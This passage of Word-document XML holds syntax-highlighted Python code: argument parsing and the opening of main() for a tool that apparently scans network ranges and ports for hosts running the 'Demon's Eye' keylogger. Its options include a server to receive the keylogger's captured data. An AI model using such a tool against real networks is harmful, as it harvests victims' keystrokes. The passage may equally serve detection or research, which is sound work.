          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>MAGIC_MESSAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">300  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-n'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--nowaitresponse'</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEFAULT_NO_WAIT_RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">301  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'NO wait response from host after sending Message (if sent). Default value: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">302  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEFAULT_NO_WAIT_RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">303  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-t'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--timeou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TIMEOUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">304  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'Timeout in seconds on port connection. Default value: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEFAULT_TIMEOUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">305  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-e'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--enableserver'</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306  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Enable Server to receive Demon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s51"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>s Eye Keylogger Data'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">307  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-s'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--serverpor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SERVER_PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">308  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'If the keylogger is found (wait response is necessary), it establishes a server to '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">309  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t xml:space="preserve">'receive data. Default value: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>DEFAULT_SERVER_PORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">310  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>add_argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'-v'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'--verbose'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>choices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s61"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">311  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'Increase output verbosity. Default value: 0'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">312  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parse_args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">313  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">314  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">315  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">316  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">317  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>listen_server_instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>listen_server_enabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">318  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">319  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s01"/>
        </w:rPr>
        <w:t># Check and parse parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">320  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>parse_params</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">321  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">verbose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">322  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">net_range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">323  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">wan_auto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>wanauto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">324  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">port_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">325  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">326  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">waitresponse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">= not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>args</w:t>
